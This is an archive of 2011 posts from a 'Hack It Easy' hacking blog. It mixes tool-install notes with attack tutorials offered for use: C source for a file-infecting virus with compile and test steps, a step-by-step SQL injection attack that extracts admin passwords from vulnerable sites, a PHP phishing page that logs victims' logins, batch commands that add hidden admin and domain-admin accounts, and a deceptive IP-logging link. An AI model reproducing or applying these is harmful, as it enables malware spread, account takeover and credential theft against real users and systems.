Get FREE lessons from "Hack It Easy Hacking Course"

Enter your email and instantly receive the lessons in your inbox for free

Wednesday, December 28, 2011

Browse anonymously with Tor

Anonymity is cool and necessary when you want to hide your identity on the web, especially for hackers.
Well, this is a simple tool for hackers to make Firefox and Ubuntu Anonymous.

To install Tor just download it via apt-get on ubuntu (debian)-

just type-

sudo apt-get install tor

When installed also install "vidalia". This tool manages tor and is GUI.

sudo apt-get install vidalia

Now open vidalia by typing

sudo vidalia

Turn tor on, now you can use this to anonymous connection.

But still this won't make the browsers anonymous for this download a small plugin for firefox.

Just click here to install tor in Firefox (tor not available for other browsers)-



https://www.torproject.org/dist/torbutton/torbutton-current.xpi

or go here - https://www.torproject.org/torbutton/index.html.en

Then after the plugin you will see a "red" icon next to address bar. Just click it and "toggle" mode.

The icon will become green, now again check your IP in the browser.

Hack it Easy :-)

Start networking in BackTrack 4

So you have installed BackTrack 4 and are ready for hacking, but you can't connect to the internet.
Well, Backtrack won't start the networking automatically to maintain stealth boot.
So, to initiate networking and enabling internet enter the following command:


root@bt:~# /etc/init.d/networking start


This command will start networking/internet in backtrack.

have fun :-)

Tuesday, November 22, 2011

Posting empty facebook status | Facebook Trick

This is a simple trick which allows you to post empty facebook statuses or comments ( yes, they are not allowed by deafult).


Steps-





Just type “@[0:0: ]” or “alt+0173″ and you are done.


You can google for many more facebook short code or symbols.

A simple facebook trick.

Diffrent ways to Access Command Prompt

This article is about hacking networks. Since any longer than five minutes, you risk getting caught, this is *hopefully* going to teach you how to get root in five minutes or less. So, lets get it started.


To those of you that think by getting root, you own everything, sorry to disapoint you. But, by getting root, you only own the comp your on. There is however, a way to get domain root, which I'll discuss later.

So first of all , try and check your access to DOS. For doing so :
"start>all programs>accessories>cmd" or "start>run> type in 'cmd'"

If it doesnt works, go and make a file named "whatever.txt" Right click, and open it in notepad. Type "cmd" in it and save, if you are able to see some black screen fr a second, yes, you can get it. Now change the content in file, i.e

replace "cmd" with following:

@echo off
echo hello
pause

If you see "HACKED" on the screen, then yes you are more closer. Finally now change the content to following :
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0


This changes the registry value that blocks dos. So, type "cmd" in the .bat and see if it works. If that also didn't work, theres still other ways.

Now, type in your commands and click "file>save as>" for the type, put "text document, and save as "anything.bat".
If that wasn't the reason, I hope you have access to the C drive.
If you do, go here "C:\Windows\system32\" and create a new folder.
Now, find "cmd.exe" and "scrnsave.scr" and copy them to the new folder.
Goto the folder and rename "scrnsave.scr" to "scrnsaveold.scr", and "cmd.exe" to "scrnsave.scr" And replace it with the real one in system32. Now the next time your screen saver appears, it will be full access dos. So, if you can, on the desktop, right click and select properties. Change the time to one minute. On windows xp, you may have to make sure the screensaver is "scrnsave".

Even if it doesnt works, you can go for control panel. yes this one is not gauranteed, but ya at least it may be try at least.

Just create a new folder and rename it to following(obviously only the {} part)


Control panel: {305CA226-D286-468e-B848-2B2E8E697B74}
Printers: {2227A280-3AEA-1069-A2DE-08002B30309D}
Taskbar and startmenu: {0DF44EAA-FF21-4412-828E-260A8728E7F1}
Microsoft FTP folder {63da6ec0-2e98-11cf-8d82-444553540000}
Temporary Internet files {7BD29E00-76C1-11CF-9DD0-00A0C9034933}
ActiveX Cache folder {88C6C381-2E85-11D0-94DE-444553540000
Subscriptions folder {F5175861-2688-11d0-9C5E-00AA00A45957}
Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48}
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}
Dial-Up Networking: {992CFFA0-F557-101A-88EC-00DD010CCC48}
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
History {FF393560-C2A7-11CF-BFF4-444553540000}

Another way to get dos, is to create a prog. Uber0n has created such a program. You can find it at http://www.freewebs.com/uber0n/ You'll need a c++ compiler.

If so far, nothing has worked. You need to crack the sam file. Pretty sure Cain & Abel has this option.

If you did get dos, it's time to create yourself an admin acct. Type this.

@echo off
net user hackplanet hackplanet /add
net localgroup administrators hackplanet /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hackplanet/t REG_DWORD /d 0


First Line just hides the file address and stuff.
Second Line Creates the user "hackplanet" with the password of "hackplanet".
Third Line adds "upgoingstar" to the administrators group.
Fourth Line makes the acct "upgoingstar" a hidden acct.
If you see "The command completed successfully." or something similiar, congragulations. You now have root. If it didn't work, it means you have limited access dos, use the screensaver thing.

If you want domain root, you can either find the domain admin's username and type


@echo off
net user [username] [newpassword]

That will change the pass.
Or, if you can get on his/her comp, type this in dos.

net group "Domain Admins" [username] /add

This will add an acct to the domain admins.


Moreover, if you don't have access to the C drive, or any other particular drive, there are a few ways to view it's contents. You just need to be able to install programs. Google has a program called "Google Desktop" which indexes the computer and makes it searchable.
Or, you can download a web browser such as Opera. In the url bar type this "file://" you should now see a list of drives.


Seems funny? Weel, actually it is. :)

Source- http://hackplanet.in

Tuesday, August 30, 2011

Adroit Business Solutions: Mobile Application Development Company,Web application development,Testing services,offshore software development | Adroit Business Solutions http://adroit-inc.com/#

Monday, August 8, 2011

Listen to latest bollywood songs for free.

While browsing I just landed on an amazing site , ganeshane.com. This site lets its users listen to latest bollywood songs for free and too for free at no charge at all.

Ganeshane has a huge database of the latest songs and great oldies as well. The interface is nicely designed and lets users browse the site while listening to songs.

The best thing we like about the site is that it has exclusive applications on all three leading smart phones - iPhone, Android and blackberry. So you can create playlists online and then listen them on your phone.

The android and iPhone application for ganeshane are paid. Do tell us if you like the app.

The service has a great potential as they deliver the latest songs and have well managed mobile applications which could definitely cover a huge consumer market.



Sunday, February 6, 2011

Creating a virus : Tutorial

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 


#include
#include
#include
#include
#include
#include FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it

Saturday, February 5, 2011

Denial of Service (DOS) attacl :Tutorial

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.

One common method of attack involves saturating the target machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.



Methods of attack

A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.Attacks can be directed at any network device, including attacks on routing devices and web, electronic mail, or Domain Name System servers.

A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:

1. Consumption of computational resources, such as bandwidth, disk space, or processor time.
2. Disruption of configuration information, such as routing information.
3. Disruption of state information, such as unsolicited resetting of TCP sessions.
4. Disruption of physical network components.
5. Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.


ICMP flood


A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. The network's bandwidth is quickly used up, preventing legitimate packets from getting through to their destination. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping" command from unix-like hosts (the -t flag on Windows systems has a far less malignant function). It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.

SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for a packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends.

Teardrop attacks

A Teardrop attack involves sending mangled IP fragments with overlapping, over-sized payloads to the target machine. This can crash various operating systems due to a bug in their TCP/IP fragmentation re-assembly code. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack.

Around September 2009, a vulnerability in Vista was referred to as a "teardrop attack", but the attack targeted SMB2 which is a higher layer than the TCP packets that teardrop used.

Peer-to-peer attacks

Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC++. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a "puppet master," instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While a typical web server can handle a few hundred connections per second before performance begins to degrade, most web servers fail almost instantly under five or six thousand connections per second. With a moderately large peer-to-peer attack, a site could potentially be hit with up to 750,000 connections in short order. The targeted web server will be plugged up by the incoming connections.

While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses. Even if a mitigation device can keep blocking IP addresses, there are other problems to consider. For instance, there is a brief moment where the connection is opened on the server side before the signature itself comes through. Only once the connection is opened to the server can the identifying signature be sent and detected, and the connection torn down. Even tearing down connections takes server resources and can harm the server.

This method of attack can be prevented by specifying in the peer-to-peer protocol which ports are allowed or not. If port 80 is not allowed, the possibilities for attack on websites can be very limited.

Asymmetry of resource utilization in starvation attacks

An attack which is successful in consuming resources on the victim computer must be either:

* carried out by an attacker with great resources, by either:
o controlling a computer with great computation power or, more commonly, large network bandwidth
o controlling a large number of computers and directing them to attack as a group. A DDOS attack is the primary example of this.
* taking advantage of a property of the operating system or applications on the victim system which enables an attack consuming vastly more of the victim's resources and the attackers (an asymmetric attack). Smurf attack, SYN flood, and NAPTHA are all asymmetric attacks.


Permanent denial-of-service attacks

A permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim's hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device's firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. This therefore "bricks" the device, rendering it unusable for its original purpose until it can be repaired or replaced.

The PDoS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet in a DDoS attack. Because of these features, and the potential and high probability of security exploits on Network Enabled Embedded Devices (NEEDs), this technique has come to the attention of numerous hacker communities. PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard's Systems Security Lab) used to detect and demonstrate

Application-level floods

On IRC, IRC floods are a common electronic warfare weapon.

Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.

Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.

Nuke

A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop.

A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim's machine, causing it to lock up and display a Blue Screen of Death (BSOD).

Distributed attack

A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

Malware can carry DDoS attack mechanisms; one of the better-known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack.

A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

These collections of systems compromisers are known as botnets. DDoS tools like stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification like smurf attacks and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes. See next section.

Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a well distributed DDoS. These flood attacks do not require completion of the TCP three way handshake and attempt to exhaust the destination SYN queue or the server bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as syn cookies may be effective mitigation against SYN queue flooding, however complete bandwidth exhaustion may require involvement

Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion — even against their business rivals.

It is important to note the difference between a DDoS and DoS attack. If an attacker mounts an attack from a single host it would be classified as a DoS attack. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack.

The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track down and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines.

It should be noted that in some cases a machine may become part of a DDoS attack with the owner's consent. An example of this is the 2010 DDoS attack against major credit card companies by supporters of WikiLeaks. In cases such as this, supporters of a movement (in this case, those opposing the arrest of WikiLeaks founder Julian Assange) choose to download and run DDoS software.

Reflected attack

A distributed reflected denial of service attack (DRDoS) involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target.

ICMP Echo Request attacks (Smurf Attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing many hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.

Many services can be exploited to act as reflectors, some harder to block than others.DNS amplification attacks involve a new mechanism that increased the amplification effect, using a much larger list of DNS servers than seen earlier.

Degradation-of-service attacks

"Pulsing" zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing it rather than crashing it. This type of attack, referred to as "degradation-of-service" rather than "denial-of-service", can be more difficult to detect than regular zombie invasions and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more damage than concentrated floods. Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the attacks

Unintentional denial of service

This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site's regular users — potentially hundreds of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link was posted by a celebrity.

An example of this occurred when Michael Jackson died in 2009. Websites such as Google and Twitter slowed down or even crashed. Many sites' servers thought the requests were from a virus or spyware trying to cause a Denial of Service attack, warning users that their queries looked like "automated requests from a computer virus or spyware application".

News sites and link sites — sites whose primary function is to provide links to interesting content elsewhere on the Internet — are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, the Drudge Report, Fark, Something Awful, and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", being "drudged", "farking", "goonrushing" and "wanging"; respectively.


Denial-of-Service Level II

The goal of DoS L2 (possibly DDoS) attack is to cause a launching of a defense mechanism which blocks the network segment from which the attack originated. In case of distributed attack or IP header modification (that depends on the kind of security behavior) it will fully block the attacked network from Internet, but without system crash.

Blind denial of service

In a blind denial of service attack, the attacker has a significant advantage. The attacker must be able to receive traffic from the victim, then the attacker must either subvert the routing fabric or use the attacker's own IP address. Either provides an opportunity for the victim to track the attacker and/or filter out his traffic. With a blind attack the attacker uses one or more forged IP addresses, making it extremely difficult for the victim to filter out those packets. The TCP SYN flood attack is an example of a blind attack.

Source- http://en.wikipedia.org/wiki/Denial-of-service_attack
By hackiteasy.com 

Friday, February 4, 2011

Find IP of remote computers

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.


I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.
1. Download the IP Finder script (IP_Finder.ZIP) that I have created.
2. Open a new account in X10Hosting (or any free host that supports PHP).
3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.
4. You can rename the ip.php to any name of your choice.
5. Set the permission to 777 on ip_log.txt.
Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.
For your better understanding let’s take up the following example.
Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be
http://abc.x10hosting.com/ip.php
You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.
To find the recorded IP address check the logs using the following link.
http://abc.x10hosting.com/ip_log.php
The sample log will be in the following format
79.92.144.237 Thursday 07th of May 2009 05:31:27 PM
59.45.144.237 Thursday 07th of May 2009 05:31:28 PM
123.92.144.237 Thursday 07th of May 2009 05:31:31 PM
NOTE: You have to replace abc with your subdomain name. 
I hope this helps. Express your opinion and suggestions through comments. by hackiteasy.com

Wednesday, January 19, 2011

Fasttrack - an automated penetration tool for linux

Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming.


In an effort to reproduce some advanced attacks and propagate it down , he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.


Installing Fast-Track:
make sure you have the latest version of Subversion

Open a terminal and type the following command (In Linux offcourse) :

svn co http://svn.thepentest.com/fasttrack /path-to-install/

The svn co simply means "check out" the latest version of Fast-Track, the /path-to-install/ is the directory you want to install Fast-Track.

If you want to update Fast-Track after you check out the files, simply type svn update, or use the Fast-Track menu to update.

When you first check out Fast-Track, there are a few modules that need to be installed, fortunately, Fast-Track comes with a setup file that helps you install the files needed. From the command line and in the Fast-Track menu, simply type:

python setup.py install

Follow the guide for installing Fast-Track, note that the setup does NOT install Metasploit for you. If you don't have Metasploit installed, some applications will not work properly. Ensure that you enter the right path to Metasploit.

Once installation has finished, run Fast-Track, if it errors out saying you do not have the proper requirements, type yes to try a different type of install. If this still doesn't work you will need to manually install the requirements.



now to run Fast-Track type:
./fast-track.py
 

to run the web GUI mod:
./ftgui
Open a browser and go to http://127.0.0.1:44444

Fast-Track HomePage: http://www.thepentest.com


hackiteasy

Monday, January 17, 2011

Tutorial: sql injection

Sql Injection tutorial advanced. So far in all the hacks the most used by h4ck3rs from n00b to an 1337 one has been the SQL injection attack. Here we at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to be working on a huge no. of sites.


The hack starts as follows.

Finding vulnerable site

To find a vunerable site open google

Type in a dork like "inurl:index.php?id=" (without quotes) there are many other similar formats for finding such vulnerable pages.


Now click on any site like http://www.yoursite.com/index.php?id=786

Now to test if the siote is hackable or not add a ' at the end of the site.

If the site gives an error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"

we can assume that it is vunerable. If not try some other site.

We have the vulnerable site now. So lets try with different sql injection queries.

Checking the number of columns:

 To check the number of columns we do the following

http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error

if we get an error at the 6 like "unknown column" that means there exists only 5 columns.

Finding vunerable columns:

To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786

Now the url becomes

http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--

after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 4 are vunerable and data can be retrieved from colums 2 and 4. This is important as we would see data on these columns only.

Finding Mysql version:

To find the sql version we replace 2 or 4 (or the bulnerable column in yor case) with @@version.

The URL would become-

http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--

After hitting enter the sql version appears on the page in the vulnerable column space

Lets assume we got 5.0.90-community-log on page which is sql version.

Getting Table names:

To get table names replace @@version in the url with table_name and add from information_schema.tables-- to the end.

The url now becomes

http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--

After hitting enter the page shows the tablenames.

Lets us assume we got something like this

comment,log,admin,news,news_comment,members.

To take over the site we data should be retrieved from admin table.As it seems the most favorable to contain all the passwords.

Getting the column names:

To get the column names from the table "admin" we do the following

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--

Converting the tablename to ascii:
 
For the real hack above first we have to convert the admin table to ascii values. Convert the tablename to ascii here

http://www.getyourwebsitehere.com/jswb/t...ascii.html

The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;

Now remove &# and add a , between them

So now it is 97,100,109,105,110

Replace it in the place of ascii of the tablename

Now it becomes

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--

You can now see something like

username pwd gender email on page

Getting username and password:

To get the username and password we use

http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin--   and hit enter.

At this point we see username and password on page.

The password may be in MD5 encrypted form, this can easilt be decrypted using the following converter-

http://www.md5decrypter.co.uk

This was a nice SQL injection hack tutorial. Please comment if you like the post.

Regards hackiteasy.com

Sunday, January 16, 2011

Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.

For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.



So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name "login.htm" .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-


<?php

header ('Location: http://www.facebook.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


replace facebook.com with the URL you want the user to go after he clicks on submit button.

Save the page as fish.php

Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like "action=" which has something with login. And replace the URl with "fish.php".

Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
Now you are done,.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you enterd previously would be saved in the log.txt  file.

Here you have a working phishing page.
bu hackiteasy

Friday, January 14, 2011

Installing John The ripper on Linux machine

John the ripper is undoubtedly one of the best password cracking tool. People have been experiencing some problems with installing it. So here we bring out a tutorial on how to install the famous password cracker on a Linux machine.


This is the method to install and use john the ripper in fedora/ubuntu (and many other linux as well)..

1) Download john the ripper software

http://www.ziddu.com/download/6365223/jo...ar.gz.html

2) Extract it and then copy the text from

http://www.openwall.com/lists/john-users/2009/09/02/3

3) Save the copy text in john folder with john.patch.

4) Open terminal and go to john folder

cd Desktop/john-1.7.3.1

5) Now we have to patch our john software with following command

patch -Np1 -i john.patch

6) go to src folder

cd src

7) run this command

make linux-x86-sse2

8) cd .. and goto run folder cd run.

9) Run this commmand

./unshadow /etc/passwd /etc/shadow > filename

10) Finally run this command to crack password

./john filename

and here you have the ripper running. 

by hackiteasy

Installing nessus on ubuntu

Installing nessus on an Ubuntu or any other Linux machine can be a difficult task. So here we bring out a tutorial to ease you out to simplify the task of installing Nessus server. Here we have shown the installation on Ubuntu machine this could be used on nay other debian of linux as well.


The totorial starts here-

Download Nessus Nessus-4.0.1-ubuntu810_amd64.deb for Ubuntu 9.04 from http://www.nessus.org.
dpkg -i Nessus-4.0.1-ubuntu810_amd64.deb
Selecting previously deselected package nessus.
(Reading database … 128086 files and directories currently installed.)
Unpacking nessus (from Nessus-4.0.1-ubuntu810_amd64.deb) …
Setting up nessus (4.0.1) …
nessusd (Nessus) 4.0.1. for Linux
(C) 1998 – 2009 Tenable Network Security, Inc.
– Please run /opt/nessus/sbin/nessus-adduser to add a user
– Register your Nessus scanner at http://www.nessus.org/register/ to obtain
all the newest plugins
– You can start nessusd by typing /etc/init.d/nessusd start
root@testserver:~# /opt/nessus/sbin/nessus-adduser
Login : admin
Authentication (pass/cert) : [pass]
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Login : admin
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added
Register for home feed.
/opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxxx-xxxx-xxxxx
/etc/init.d/nessusd start
To run Nessus from the command line you use an option “q” that is for batch mode. This allows running from a terminal and without the GUI interface to the client. Handy if you would like to script or automate your scans.
Using batch mode the IP’s that are to be scanned are read from a file.
echo “192.168.0.1″ >> iptoscan.txt
/opt/nessus/bin/nessus -q 127.0.0.1 1241 admin password iptoscan.txt scanresults2.html -T htm
Replace “admin password” in your command with the login and password you chose when you created the user using nessus-adduser.
~$ OpenVAS-Client –help
Usage:
